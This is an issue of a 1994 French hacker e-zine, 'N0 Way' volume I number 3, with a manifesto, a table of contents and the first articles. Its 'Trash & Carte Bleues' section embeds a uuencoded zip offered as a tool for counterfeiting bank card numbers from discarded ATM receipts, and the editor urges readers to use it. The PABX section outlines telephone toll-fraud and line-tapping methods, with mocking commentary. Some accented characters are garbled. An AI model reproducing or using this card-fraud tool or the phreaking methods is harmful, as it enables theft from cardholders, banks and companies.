Copy Link
Add to Bookmark
Report
N0 Way Volume I, Numero 3
-%!% N0 Way %!%-
Volume I, Numéro 3, Partie 3.1
26 Septembre 1994
\-------------------/
> N0 WAY III <
/-------------------\
Ce matin, j'écoute la radio: "Une famille algérienne va àtre expulsée. Le
village oó ils habitent se mobilise contre cet avis d'expulsion..." et le
préfet raconte des conneries sur la situation déplorable que devait avoir cette
famille en France sans travail stable et sans sécurité sociale.
Mais bien sur, dans son mental de politique verreux, il ne pensera jamais à
leur bonne intégration et aux problämes qu'ils affronteront en Algérie.
Il ne pensera pas non plus au FIS qui s'attaquera a eux.
Je ferme la radio, dégouté ET LA, ca change: non, je ne me dis pas
"Qu'est ce que je peux y faire, je suis isolé"
Je ne me morfond pas en disant: "On peut rien faire contre ces pourris".
Si, on peut faire quelque chose et N0 Way 3 est là pour se battre à sa maniäre
contre toutes ces pourritures. Maintenant, BASTA...
Les hackers&phone phreaks sont là !
N0 Way est là !
Alors dans cette issue sortie en quatrieme vitesse, j'espere que vous trouverez
votre bonheur. Ca bouge un peu partout en france, on entre dans l'hiver et
pourtant on sort de l'hibernation.
A Toulouse des assos se sont montées pour faire bouger le monde de la
rave, a Paris c'est une complete effervescence. Chaque jour, je voie avec
plaisir un nouvel "apprenti sorcier" des réseaux me poser des question sur:
"Comment on hacke?"
"Comment on devient root sur Unix?"
"Comment on seize un trunk au Japon?"
Et les villes suivent: intiative techno & squatts à Lyon, bars & magasins
technos et cyberpunk à Montpellier, raves underground à Lille, développeur de
virus informatiques à Rouen, boite HardCore à Tours etc...
Des initiatives jeunes se montent de plus en plus souvent dans notre
société gérontocratique: Bars technos, Concerts grunge (à prendre au sens réel
du mot), Teknivals (ou teknivaux? :), Bar Cyberpunk, accäs Internet pas cher,
home studio d'enfer...
Aux USA il y a déja les Cypherpunks qui ont fait vraiment du boulot,
l'EFF s'est battu comme un diable contre le Clipper Chip menaáant la vie privée
de chacun. Matt Blaze a montré que le SkipJack (implémentation de ce que l'on
appelle le Clipper Chip) était facilement "manoeuvrable".
Résultat: le gouvernement retire le Clipper Chip.
La màme bataille reste à mener en France. En Europe, des choses träs
graves se passent sans qu'on en entende tellement parler. En france, les
"pirates informatiques" sont montrés du doigt comme de petits vandales
informatiques, Satanés gosses, tous les màmes.
Alors, lisez N0 Way, et RéAgIsSeZ !!!! Faites comme tous les cyberpunks
de France: bougez vous et devenez actif dans le combat contre cet establishment
qui nous étouffe.
Dans ce numéro nous vous proposons un superbe article de notre ami Arscene sur
la dissimulation de fichiers, un fichier répandu mais d'une qualité
extraordinaire sur l'insécurité d'Unix par Dan Farmer et Wietse Venema,
le manifeste génial de "The Mentor" traduit pour la premiäre fois en
Francais et plein d'autres superbes articles "mortels"...
Vous pourrez vous "fendre la gueule(tm)" avec un article en particulier.
Arrested Developpment, official distributor in Nederland (NL): +31 77 547 477
The One propage -- N0 Way -- en France et en Europe: +33 49 88 76 91 (BBS)
+33 48 70 10 29 (Minitel)
+33 48 58 46 17 (Minitel)
Vous pouvez me joindre:
~~~~~~~~~~~~~~~~~~~~~~
Sur RTC 0NE ! |\
Sur 3615 TALK | > Bal: NeurAlien
Sur The 0ne ! |/
Sur Internet !!!!
Email: an133729@anon.penet.fi (signez vos messages avec votre Email).
>>>>>>>>>>>>>>> TOUT ARTICLE ACCEPTE *<<<<<<<<<<<<<<<
"This is the network of the life" --Corona.
++NeurAlien.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Disclaimer:
Cette publication électronique peut contenir des informations,
données et articles interdits dans certains pays. Si les
informations de cette publication sont interdites dans un pays,
il est du devoir du lecteur de vérifier qu'il a bien le droit de
posséder et de lire (ahahahaha :-) cette publication. Les auteurs
et éditeurs ne sont en aucun cas responsables d'une mauvaise
utilisation des informations publiées. Pour les attaques en
diffamation et autres conneries bonne pour les censeurs, allez
voir qui vous croyez àtre l'éditeur.... Pour la simple et bonne
raison que de responsable de la publication et d'éditeur il n'y
en a pas!!! Les informations fournies dans cette publication sont
à titre informatifs uniquement. Nous ne vous garantissons rien et
si ca vous plait pas allez lire autre chose! Hahahahahahahahahaha...
Toutefois, la diffusion et la lecture de ce bulletin PRIVE est
restreinte à toutes les personnes dans l'underground informatique.
Ne font pas partie de l'underground informatique tel que je le concoit
les personnes suivantes: Membres d'équipes de sécurité publiques ou
privés, personnes affiliées à des agences gouvernementales,
informateurs quelconques, responsables sécurités et autres empaffés se
croyant supérieur de par leur titre.
Lire ce bulletin en n'étant pas dans l'underground informatique
constitue donc une violation des lois de Copyright et de Propriété
Intellectuelle ainsi qu'un acte de malveillance envers les auteurs et
les rédacteurs car cela revient à lire des informations propriétaires.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Apräs áa, c'est pas la DST qui peut nous faire un procäs pour
N0 WAY...
"Quoi? Vous avez lu de la documentation propriétaire et secräte alors que vous
faites partie d'une agence de sécurité????"
-%!% N0 Way %!%-
Volume I, Numéro 3, Partie 3.2
Table des matiäres:
~~~~~~~~~~~~~~~~~~
# Titre Auteur Taille
3.1 : Introduction N0 Way Team 6 Ko
3.2 : Table des matiäres N0 Way Team 2 Ko
3.3 : Trash & Carte Bleues Field 9 Ko
3.4 : Piratage des PABX -- Premier Acte. *Operator TDF* 17 Ko
3.5 : La conscience d'un Hacker The Mentor 4 Ko
3.6 : Data dissimulation techniques Arscene 20 Ko
3.7 : Playing hide 'n' seek in CyberSpace NeurAlien 21 Ko
3.8 : Cartes Téléphoniques -- Premier Acte. D. O'Connell 9 Ko
3.9 : L'Underground Francais sous developpe? * NeurAlien 16 Ko
3.10: L'art du Social Engineering NeurAlien 7 Ko
3.11: "Breaking Into Your Site" D. Farmer & W. Venema 53 Ko
3.12: Plaisanter sous Unix NeurAlien 10 Ko
3.13: Du coté d'Internet NeurAlien 19 Ko
3.14: L'explosif? Tient tient... Inlandsis 7 Ko
3.15: Prime & The PrimeOS environment * NeurAlien 6 Ko
3.16: Rave Revolt NeurAlien 4 Ko
3.17: Multics * NeurAlien 7 Ko
3.18: Tel - Trixx NeurAlien 6 Ko
Nota: une étoile (*) apräs le nom de l'article veut dire que cet article a été
fait pour CORE DUMP et ressort pour N0 WAY.
-%!% N0 Way %!%-
Volume I, Numéro 3, Partie 3.3
>--------------<
> TrAsH &&& C.B. <
>--------------<
Le fichier suivant est à uudecoder. Si vous savez pas faire c'est vraiment que
vous avez autre chose à apprendre que la contrefacon de numéro de cartes
bancaires.
Ce petit utilitaire a été écrit pour ST (GFA basic) par FIELD.
Il permet de générer des numéros de carte bleue à partir des bouts de papier
trouvés dans les poubelles des distributeurs automatiques.
Vous pouvez contacter Field sur The 0ne. +33 1 48 70 10 29
alors, revetez votre cyber-combinaison, prenez votre portable et votre radio-
modem 28800 bauds puis rendez vous à l'ATM le plus proche pour une autre
session de délire avec N0 Way...
++NeurAlien.
----------------------------------CUT HERE-----------------------------------
section 1 of uuencode 3.07 of file cb_nums.zip by R.E.M.
begin 644 cb_nums.zip
M4$L#!!0``@`(`&1F)QWUW^]R`04``(X+```+````0T)?3E5-4RY'1D&M5LUO;
M&T44GQW;&W^LG<3Y:H*3C*VH::,VV$DV:1!2V8UWBHMC1W9:A%0)F62K&KEV'
M\4=4]51%XMX#!X[\$1QZ[*DJ$D*<N.',2@@AU`-';N7-?MG+6B8'DOSFO?ST(
MWF_>FYW9612X0Y6;JE(M'&PCZZ>/D'`5L'D)M/V(O$0H^CO@3X1BKQ&2DH#Y(
M2T#U(_&$0RS=.]0JY<!1N2I6CRL%K20H@BH<"'E!PTH.*UM8V<;*#E9DK.QB"
M90\KM["R'U!R64`.L`78!NP`9,!N\*A2SH?XD#/'[9`YA^G+YKAGCONB&9.S5
MS+9EY``$!T$I&P0'YL]B-8?5+:QN8W4'JS)6=[&ZA]5;6-T/J%"%"E6H4(4*0
M5:A0A0H::FXW0"L:LKN#1@1EJ!7%[.82K8A:Z:`\T$&A0NGHWO'$?:U2H`4M7
M6M(^_=Q>/T@P"PYII7R!1K1J52EL9K/94%Y3(8,6#CXN:!4A)VRA,/H;A2DRE
M[81IKYA6#+ZE%.V&7O5OY%O-IOZ,-'1RTCK5"?PU:N2+6O.KGDZND1UR\JC^S
M\&%;[Y#KY(.T@2G:@"PRR&KV'I^W6SQO?Q`+D2)%5W&QGZKH)X_T-H#4SO03`
MR.@,PC(\:A,?';Z!_;J1_N]@BD1<A#$QR$'4["Y"#Y&(4G:/O&<"OX$[9/7G'
MX_[T@P.E<JQ5;;-9RA&*UH)K?:&<=G3\,:`11;=`XR?Z!DFXJ/+("<@L05]W(
ME&Y7;W;KK299=S/6B?ZTWNG6ZEUR>OYEC=P@]08YJQ&]V]9)6V^V'I\3?2AA,
M:WV3HE3H>3]R4FMW]<YF,]<8^%MVC:UQ-7:AZS7W";>'UH"O2%C((NDE-6W<_
MM@M@DV`W?D7?F2^*(*8ZNB+L(.&V@=,_\+F$M#E"KYP/N#SV\$&7#WCXD,L'#
M75Z"&<.R`:[E1V0CX/A1V0@Z?DPV0MSG.N';ACBJGHC+>^N)NKRWGIC+!SV\[
MY/(A#Q]W>='#)UQ^PL-/NGS8PT^Y?,2S#@G9"#O]3LI&Q/&G9"/J^-.R$7/\B
MI&Q(CC\C&W''GY6-A.//R<:DX\_+QA3W^9X0^)EQ]P3_C^\!!'M@%NPB"T]<0
M/+=V`1PD-,_/S-T\6YR\</;&72=R,73QPMDOV-YU4UR+(9$MBBQ"K<@E%AVA*
M^2U;\FDNL:5QFDLBB]F:*2:-T'S+4C[-%$N-TTR)+&YK+K.$7_.3C]BR3W.92
M+8_37!;9I*VYPJ9&:'[#5GR:*VQEG.:*R*9MS566'*'Y!UOU::ZRU7&:JR*;@
ML34)F_5K%C]DQ*=)&!FG240V9VNFV?P(S1<L[=-,L_0XS;3(%FS-#$-A-QLB@
M.;?&4&R82YCS_,;6)):Q]CRFQ]:;^_`7VD1/<?$S?OI6S#,8)9D]%@9$`%%`]
M+-,7."<!XH`$8-+FI@#3@"1@QN9F`7.`><!"IC]'1OUD^$D<NC$>#.XK3/[7:
M"IR.=7L5!V<=TR?F>BVP!=%^+H%W])WU7$H_LH69P3.8<6\&GA%G\1$9KUE\D
M*./4O5-XAL0D3X;Y3$JOF#3#-IP[>Q=NS?GB>JM]6F_6NGJO3;XFW7:K=W;.V
MFT*9_K3]+=&!*[-1/X4K\%^KR#N-FO>\U>E@]+[IIBFU[)7A.%KY:KMYOB
M]1KZLYMGK5Z'])KPD=&S+F;GH^-:^?W2=9(VDM3JN:P:R??@(T$P38O:MZQAO
M[:YRA2:1*/PU5`N?/8B^_P=02P,$%`````@`X'OU'!=FX(YY`@``\P8```L`(
M``!214%$7TU%+D=30U/`#FX=(0CV\W)A5Z>P62%:V]@X5E?#4%/7Q-+"0M?<2
MS-)0(2"Q*+-8WZTH,2\Y%:@$AX&;%4Z>I0[8K;`98N`NA5MP?]VY<^?^_?M`M
M4@&/$!9%"@K[@>;`#82!V_?!)$CI_=MP(3U4(9`B/51%$``U$`F`I/44[MR_?
M#01WP#P(@2($Q+^01'BY[@-MN`V"0./OW84:=/OVIMNW[X*X0/P+50BB"$@BA
M%$$-!ID!=--M!8B!</M!FL"*(5+H0O<A0`%-$1AC&/>+H'%P0,@XN&^!&*04$
MZ!60T`]4(84[4/?=AXN09!QV&X`8IW'W;X-C'=EGMS$]"Q4"I30P0"BZ#XG,U
M^U@BXP=A`Y%"#ZX(;@*2@7=0DLMM1$KXB6K@O=N0P$-6=.<V#&-)PC^!?@(IW
MO8^1@A"._JF`4(21K<`Y#V2KPIW;"$-O*R"Y`*SH)[(B&$#*IP?@@I`,#4ZC:
MD*`!!SB4ANE'4P0!-Q$&GJ!2T;0'8N`!U/)OLX);9DJ^7VJ)E9&5D8F!OI&AF
MD:&>D:%"<$%B439(N-C`($\A.3\W,R]=83-:X7D3+1I`X,`1$@#(@`!G?8\`%
M$PM]QQ)@6:WOD9B<K9ZG4)!1E)J8#;13WR4_N5@_(!-(!.>7YJ7\"DY-+LDOL
M4C#(2]5W+2S-S,NOT'?U-M!W*RTJR2Q+U8>X*"C86=\OM5PA.+&DM"A/(=PCF
M\)=S?EY)47Z.0DAJ8JZ^8U%V1F*N@AM0/""C"&@E4#^0\,M7"$^L5$C)+"Y1\
M*,XL2?V%\)^BP@<_@P\*08XAG@80IHNCIT^D@H^GKV<(1"`@R#/,T3D2PG%T?
M"@WV#'-5<'/T=E50Y.4"`%!+`P04````"`"2H@(=BOTJL54"``#Y!0``#```C
M`%)%041?1$E3+E546%,`@0T;-^$"&S<`Y>^`52GHX5?(RP4S[/9],+BM`)9!J
M\("&Z8'5_$15B`K`"I$,4[A]7V'#!IAA<![894"3_H$<AJ00%6`:IK`!V3`%7
MF!JHRQ`*,<W"-.P^BF'W$88IH'@3[C&(*5`NNF$P*R"&(2P$^>\^./B18PI54
M/7H$*&P$`5B(0GC(+D.+S=MP%;@-0P5($0"*`07B#<.2=K!%`$(*B4(S[#Y6@
M`/?F?4@,(`Q#J,!B&.Z$#8U(HG.`PBV%(Q0"A?U0LS8#<>@OA?>_%%Q^*3SY.
MI1#T2\$=3!K\0H@#00A85N,7B&$`%E\+Y@:#9#?#'':`<H?=A)D%LC3CB4+>E
MDW*%D"]/\EP4\N<KK/4[].3+^V4AF09YCCD*X8E![Z(4D@U*@[ZL?1>TUB]='
MP>"+^[+W:X.7A:PUR-,#&C0W/U0]1<%GK7>JPB$#A:0G"LO>*X2&P+4HK%`P6
M*`(I*E)XF._XQ44AU[%2X>$[D)*4M<4A7]8FA1[RS'^O4+RVY(G""K##(.H5$
MLD*+0Q3*'?-"%(H-<I\HY+LI`(U4F+\V[PE0M.A)%=!DGW<A"I4&I0H:RWQRC
M%`SRX(H\`A7R@Q2L8-X,?>_R),@]R!](*X0\T0@Q>+_6.5C!,??)E[7)CGD*[
MX4#E5@I!3QX^\5'P>;(V.#3HB8*VH;Z%@:&N8["WKLG:$$7\)CTI#<H/>`<W1
M*<3CB8+!^R<*#Q\&`[5H&QOK&YI86N@&/0DF9)!C\=IE?B!IB$$N&D#O_'X2F
MY./OZ`(TR,+42-_(W%`WV"#<PS'$GI<+`%!+`P04````"`#H92<=:TQK`&8'R
M```J$0``"P```$-"7TY535,N1$]#K5C?;]M&$GXWX/]AWF3'%FDGOL0QF@"VF
M$C<IDM9-?%?@C@=A1:WLO?"'LB3=7$S=@P"_]*^^;V:X$M4F=0N43B*2N_/-`
MS#??S%KQ=G9"YZ]?OGFQO45\S7UYY4V>6YI;G]NZ-D5-4TO>UKYL;JS'0T5%Y
MDR]]6?%":GQMJ;.>F"(USENZH[GQKM;=3RF]=K.9QVUE27`8M6H\97A'P;IV.
MZ0=;*ZKUM7$%[EU5>S=I:MMX69FX+,.F:'MK>VMD4T>V0H!ED5)F\)DVN2UJV
M4[NRH&G32^=CXU;>K?B<&N!G`^,1'5X)"X?1/U]?1'3F;`$+CJ,'86A9+\&$'
M&<(Z<]62L.O;\]/AF:E<2O]ASHK*BB$G5LV7J3/86-M*B+@829ZP+@:F\25(-
M,$W:%.QCDOV2,V\9QVBF#;,(^(O3]Z/3-\CV[]AE&YH.7#$K?2X95BL.OT;3>
MR?86X!%_,:6BS"<`Q>*+TS/:Z9L@C+ID3`Y];;V+PMR4386<(04"DI9(7[IBR
MBOU<23!?E4JRU35S8UP-:[^LG5\2E])UO'3B83?O7I]1V5!:YO/:1C3JK[$HK
M>)W+RQM*T`T_\ZR!LFJN;6WSN>3:TQ=B<YE2G)8>;^8E,K]#Z)8563O+EFLOM
MHS-J:B>UG)?"95<@UCM2B'!K/\%19D\(*6R$/]+HCIX^.:*#PX>/Z.AOCY_0.
M\=/#`\C#?H$KZPWG=$(/'_%6[)2-G&8O6A&S:3XA+W.C[><+9U'759IP#BXXL
M2>F^T':0R7<#X\!Z;OS'9@GY0I%3QE`Q=TW%]9>2UE;@*XZ512WMAXJ`PV+PI
M7PA>Y:DI`YW[`I+KBBS_3&T.<=G/7"1N/0IS(E58@00-0)]P5P&Z:F8S)U-EP
M)L."!3RWM>,V014F-N,WO88=LO6-Q"H]:S4%J1@@T9VFJN`2XJB<=H#[C$RM7
MCHEW%K9,PAWE9=%K:,2B4VYSPK%8I&MU3-C^N$/-;]#2S%F*_E7<;&/(L9!K,
M,=8Q@5L1,%>JT2Z>^U\J.CX(P!&]SI1-H08JF6*=K4OM9EF#O\*F-0+DKG\[B
M^N$MEPJ(:%[/1#6I4J*4,6,BZ$D9*L@MD#N6CH0%<MZB<^MFOIR95$;F$@(1A
M-@(7:TH#"2'],$%7;`'N37]<]N5!==D`=V`FI9]N=A'$R^($'%=<IKFEH[76:
M=Z2_NNZ$>U>9BLZ^O\!P`FL5]U167H7)-662_!<],+RVV5!*P\WF6>(BIDD8V
M^5-1HZ\8B`>93>45"H_PF6D]L124MS:B3--4F`^"`B5!UEZZ%,?+U4JXJ8Q>S
MH=U5?%[HK*RDI=@W7H'-JN%5B!H?&,N3I12<>>YKBM,IK*@03F6^`:O)2R=%V
MV9Q36C2QWD%9W<PIZ*/'AT<BI5WIE._6_AD-*+TSK)LZH<#=&<O#"HE+AW9#T
M(<,TT,YFXDR^S%SINP/K;O-(92]=7*LS$*:8!,.,!?4/AIRS%#]W#.>:LEDUG
MPKO+T?"'[U]VOT,0Y:Z`?49'Q\,G!\/#@^'#I\138F*R\)O.]M8EY&BE($SC>
MG1SL4RA_[I?I$IKEDA52/EGZV`SN,,RXS3A4GN8I$IHQKH[(U%1=]5BI.#HP;
M\SP/%9[IE9ED[(E/X>TMG/$#/70Z"JW,ROZY+L6@KUW#9T-Z@1+-7"8,5G9*5
M];5O>($-]XCB7YE$]+M7O-X4L>.XE1</?N.Y'/;0!OA1\W8\'D?1N$/:`T0<?
MXQ5>C&4EXEO:ER>YY5W\3SMH!^L`<"6=[V`LS@90;;<<]T*.@UD27H['+2ZV3
MVEV%F224C,=Q,):]+2),QNL(^1.>$UKP,S8LU#P.(`OQU"8!L7\M:!RWH5RWX
M8AL+7,Q_NOLUSP(2WW:/"K5(-.68@XHYV`YPC\!&JYRTBH?`^95P+RA)*S=)^
M>%3@!=]%RO.NIAP%L@`GCD)&XUW>V:ZH3/1OLGJ\[2J4:)WE/@XIQQTC0IQ$K
MJ-ERT'M*9;R)R!:W?0J3/IYDW++A0IG9462%C=>W29>EL-HQR>%A^T+A]L+F?
M7?T(BDG&.VNTE:@6BIUH#(N.WUB(7P7'*.,.[#9DC?L!*$Q6R8B9PB?CF%9NF
M-0:`19UWYFM'_F@B(M6D72E5-L:B`7E\UE69QKH6`HLT-+9J^2G1#A[2\`'^&
MALIIZ61CI!"J@R1P\6`]=D)OM2$I#;D-XN=.ZV_\53WC(&`=$FP\Z&^):#U'N
M,`6HOPZCL[/WNIS$7YB$>QM/@TW8:.W@-Q>FV[._]MK>>H]?RDI/!X6-7WXH1
MX_/SR_@E3I6B_!2?-_C*<6/C4__AVN3TTZL?:?B_(7WS7#Y&.,=\F=&EQ=JY6
MMT5Z3:]^O"_"Y_3J`H<;_53Z;$KXZFGIFWLBY`.#Z")^%9_&HWW8'QWOT[G)W
M<)#NT_O+?3K-W979Y^^G/QMO/^_3M2OJ:I]&UX8_^-S*2WR_(-(SYGY:GM,[&
M5USA.^?/=')/?*L(_X6Z/L+/OR'8'3I$TQ[AU^HA'>/G"3X?X^E03K]#^K:DH
M@_B-/%S@?QHJJ/`<WW)QH/_1"/_4M;WU?U!+`0(7!10``@`(`&1F)QWUW^]R3
M`04``(X+```+``````````$```````````!#0E].54U3+D=&05!+`0(:!10`*
M```(`.![]1P79N".>0(``/,&```+````````````(````"H%``!214%$7TU%=
M+D=30U!+`0(:!10````(`)*B`AV*_2JQ50(``/D%```,````````````(```'
M`,P'``!214%$7T1)4RY55%A02P$"&@44````"`#H92<=:TQK`&8'```J$0``\
M"P```````````"````!+"@``0T)?3E5-4RY$3T-02P4&``````0`!`#E````D
MVA$``+,!1&EZ('=A<F4@=V%S(&QE96-H960@9G)O;2XN+@T*R<W-("#;V]O;)
MLB#;V]O;LB#;V]O;LB#-S;O)S<W-(%LK,S-=+2@Q*2TT.3@X+3<V.3$@<V]OT
M;B!A;B!54U(@5C,T(&YO9&4N+BX@S<W-NPT*NB`@("#;LB#;LB#;LB#;LB#;N
MLB`@("`@(+JZ(%-E8W1O<B!/;F4O17%U:6YO>"]%2T\O1G5R=&EV92]&1E0O<
M07)K:&%M+TI&1B!72%$@N@T*NE1H92#;LB#;LB#;LB#;LB#;V]NR($)"4[JZ/
M("%&=6-K(2]#;VYT<F]L(%1E86T@1DA1("T@4&AR86-K+TYO(%=A>2!D:7-T9
M('-I=&4@N@T*NB`@("#;LB#;LB#;LB#;LB#;LB`@("`@(+JZ(%!#+T%T87)II
M+TA0-#@O4$A!0R]-:7-C96QL86YY("T@2G5S="!K97=L('=A<F5Z("$@N@T*=
MR,W-("#;V]O;LB#;LB#;LB#;V]O;LB#-S;S(S<W-($ME=VP@<F%T:6]S+"!NZ
D;VYE(&9O<B!L;VYG+61I<W1A;F-E(&-A;&QE<G,@S<W-O`T*6
``
end
sum -r/size 57111/7388 section (from "begin" to "end")
sum -r/size 39491/5256 entire input file
----------------------------------CUT HERE-----------------------------------
-%!% N0 Way %!%-
Volume I, Numéro 3, Partie 3.4
,{$' Piratage '$},
. __=/%(~{; ;}~)%\=__ .
~\|[:&^ des ^&:]|/~
`\![! !]!/'
`+# P.A.B.X #+'
PART I
Avant propos: Apparemment, en France aussi les grandes entreprise se
mettent à réagir contre le piratage des PABX. Ce document provient d'une
grosse entreprise francaise et concerne le piratage des PABX.
Interressant de voir comment le monde des hackers est aidé par les entreprises.
J'ai trouvé ce document dans les poubelles du secretariat de l'entreprise qui
produit ce document! arf'''
ps: ce qui est entre crochet vient de moi. ++NeurAlien.
--------
Le piratage classique des systemes telephoniques PABX
Societe Operator TDF
[ya pas de copyright, on est inattaquable hehehe]
Le Piratage telephonique.
Sommaire:
1¯) Approche chronologique en terme de piratage de ligne:
A) Premier controle de facture
B) Controle de la facture suivante [Kewl, ca nous laisse 4 mois tranquile]
C) Prise de conscience [ptin ils sont lents ;) ]
2¯) Approche chronologique en terme de perte de contrat
A) Baisse du chiffre d'affaires
B) Augmentation du CA du concurrent
C) Prise de conscience [bin oui, t't'es fait niquer! ;) ]
3¯) Les types de piratage:
A) Ecoute des communications
B) Detournement d'une ligne
C) Recherche des lignes modem
D) Sabotage des systämes [Beurk!!!!]
4¯) Les méthodes de piratage:
A) Piratage d'une ligne.
B) Piratage d'un base TSF. [Telephone Sans Fil je crois]
C) Piratage des fonctionnalités d'un PABX.
D) Piratage des auxiliaires d'un PABX [Messagerie vocale par ex.]
5¯) Les moyens à mettre en oeuvre:
A) L'acces des locaux
B) Protection des informations
C) Destruction des informations périmées
D) Sauvegarde de l'information
6¯) Les moyens de controle:
A) la taxation téléphonique
B) L'observation de trafic.
[==Deuxieme partie dans le prochain numéro==]
C) Le controle qualité des lignes.
7¯) La protection des lignes des systämes [a partir d'ici, c'est sur le mec ]
A) Piratage du mot de passe [ qui a écrit ca avait fumé ou ]
B) Mot ou clef aléatoire [ gobbé un acide ]
C) Cryptage des lignes
D) Cryptage du disque dur
E) réorientation des appels
8¯) Les supports de transmission.
A) Les supports radio.
B) Les supports physiques.
C) Les cabines de brassage.
D) la gestion des supports.
9¯) Les couts du piratage:
A) cout des fonctionalités
B) cout de la telemaintenance
C) Piratage volontaire du PABX
D) Piratage de l'informatique
10¯) Les méthodes:
A) Introduction
B) La méthode MARION
C) La méthode MELISA
11¯) La loi godfrain: [ Rahhhh.. chiotte galactique !]
A) Intro
B) destruction
C) les niveaux de cette loi.
Document
1¯) A)
taux normal: augmentation de la facture : 4% tous les deux mois.
Element moteur: elevation anormale de la facturation
controle par rapport aux factures precedentes.
detection: taux d'augmentation constant, passant brutalement d'une
facture sur l'autre de 4% à 9%
constat: augm.o brutale de 5% en plus des 4% habituels.
pourquoi?
- pas de changement de contrat, pas de creation de nouveau service.
Action: demande de controle et facturation detaillee pour les mois a
venir.
B) facture suivante:
meme chose : augmentation 9%
analyse: verif de la fact. detaillee.
constat: - appels minitel
- appels vers l'étranger
- appels en dehors des heures ouvrables
question: interne ou externe?
reponse: les deux
conclusion: le systäme est piraté.
Cette conclusion doit rester interne et confidentielle.
action: eliminer les causes interne en premier
action sys: controle d'acces
>>> EVITER DE FAIRE CONTROLER SON SYSTEME PAR SON INSTALLATEUR OU
CONSTRUCTEUR DANS UN PREMIER TEMPS.
C) prise de conscience
a) demande d'info:
- autres entreprise
- presse spécialisée
b) declenchement d'une mission interne preliminaire:
1) constitution d'un groupe de travail.
2) definir les objectifs
3) definir un planning
4) rechercher un cabinet independant disposant d'experts en la
matiere.
5) presentation du probleme.
6) Etablir un contrat definissant la mission du cabinet.
7) signature du contrat.
c) declenchement d'un audit.
1) def.o de la mission
2) planif.o " "
3) analyse physique de l'existant
4) analyse des risques financiers
5) analyse du systäme
6) definition des controles à mettre en oeuvre
7) definition des tests à réaliser
8) mise en oeuvre de 6 et 7 [ OUARF... TROP UTILE LA 8) !!! ;) ]
9) [yen a pas!!!! bin alors ?? ;) ]
10) Consignation des résultats
11) les recommandations à mettre en oeuvre
12) Synthäse économique et technique sur les risques et les moyens
complémentaires de protection à mettre en oeuvre.
d) action:
mise en place des solution d'urgence préconisées.
2¯) [ c'est chiant je passe]
résumé: voir si ya pas un employé qu'est parti à la concurrence.
3¯) les types de pirate:
A) detournement d'une ligne pour téléphoner [ ouais !!!!! Beige Box rules ]
B) detournement d'une ligne pour appeler des serveurs Nitel [ kewl ! ]
C) ecoute des communications [ c'est vous qui le dite ;) ]
D) Le pirate informatique, vol d'information [ bande de paranos, on
en a rien a foutre de votre bilan commercial cumulé sur l'effectif
différé rétroactif.... tout ce qu'on veut c'est VOTRE SYSTEME !! ;) ]
E) Le sabotage des systämes [ ya que les burnes qui font ca ! ]
F) Le pirate sportif [ ouais !!!!! ca c'est kewl ! ]
A) detournement d'une ligne pour téléphoner [ ouais !!!!! Beige Box rules ]
Objectif: telephoner gratuitement à cout moindre
[ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ]
[ mais il était raide bourré le mec qui a ]
[ écrit cela !!!! hahaha... je suis pete de rire ]
Ce detournement peut etre volontaire: [ plutot oui! ]
- programmation volontaire sur un poste ou dans le pabx.
- appel d'un auxiliaire du PABX, messagerie vocale par exemple,
pour ressortir vers l'exterieur.
Pour un appel vers l'etranger, le pirate sera taxé de son
domicile au PABX piraté. Ce dernier sera taxé pour la ligne
établie jusqu'à l'étranger.
ou involontaire: [ on y croit ! ]
mauvaise affectation des taxes sur les postes.
- lors de l'utilisation de la fonction conference
- transfert
- renvoi
B) Detournement pour appeler des serveurs minitel:
le detournement dans ce cas est generalement volontaire [ ouahahahaha ]
La méthode consiste à appeler le PABX d'une société:
- obtenir une ligne sur le PABX
- surnuméroter cette ligne
- ressortir vers l'exterieur.
- obtenir la liaison avec un serveur.
C) Ecoute teleph
[ c'est chiant, je tape pas ces conneries ! ]
D) Le pirate informatique, vol d'information
PIRATE ===> PABX société A
||
||
\/
Central FT ville 1 =====> Central FT Ville 2
||
||
\/
Site informatique piraté.
[ comme ca la trace est remontée plus difficilement ]
E) Le sabotage des systämes
[ PFFFF..... ]
F) Le pirate sportif [ La le mec sait ce qu'il dit ! ]
Objectif du pirate: l'argent n'est pas la motivation principale,
du moins au départ.
buts: * se connecter à un max de systäme
* penetrer par jeu
* s'introduire au coeur meme du systäme par défi
methode utiliséee:
* recherche des numéros d'appel
* recherche de mot de passe
* contourner les protections
* acceder aux fonctions interdites
Son but n'est pas de casser. Il peut seulement souhaiter utiliser des
heures machines ou des données.
Peu dangereux, il peut le devenir si: [ jamais vu cela ! ]
- il donne ses infos à des tiers sans scrupules
- des société concurrentes
- il est recruté pour l'argent
4¯)
A) Piratage physique des lignes analogiques
FT Central FT
||
-------------------- ||
\/
Société PABX
||
\/
-------------------- repartiteur dans la cabine PABX. *
||
Immeuble de la société ||
\/
repartiteur général * $
||
||
\/
sous repartit d'étage * $
||
||
\/
poste tel . * $
[ une * == point de piratage physique possible en analogique ]
[ un $ == point de piratage physique possible en numérique ]
Piratage physique des lignes.
a) methode simple et a peu de frais. Possibilité de se connecter sur
tous les points du cheminement de la sortie du central au point
final d'implantation du poste.
b) Dans le cas d'un raccordement numérique du PABX, il ne sera pas
possible de se raccorder sur le cheminement du central à la société.
Un piratage de ce type necessite un equipement d'un cout tres
dissuasif.
La partie sensible se situe donc entre le PABX et la prise murale ou
est connecté le poste analogique. Le pirratage ne pourra etre fait
qu'a L'INTERIEUR de l'immeuble.
c) Dans le cas d'une liaison numérique de bout en bout, le piratage à
peu de frais deviens impossible [Ah ouais? t'veux une contre preuve?]
B) Piratage des fonctionnalités du PABX
Nous avons ici deux types de piratage possible:
* volontaire avec les fonctionnalités disponible dans le PABX.
* involontaire : affectation des taxes a un autre poste que le sien
sans l'avoir voulu.
Il s'agit le plus souvent de mauvais parametrage lors de la
programmation ou des erreurs dans le logiciel lors de sa conception.
Exemple concret lié à un bug:
si l'initiateur d'unee conference avec deux correspondant exterieurs
raccroche en premier, question:
- est ce que les deux autres personnes seront coupées
- Si la réponse est non qui sera taxe?
Idem dans le cas d'un appel transféré vers l'exterieur.
Les fonctionnalités concernées sont:
* conference: verifier si les corresp. st coupés qd l'initiateur
raccroche
* transfert : lors des transferts interne, verifier si la repartition
des taxes s'effectue correctement.
* renvoi: avec un MIC T2 grand confort, il est possible de renvoyer les
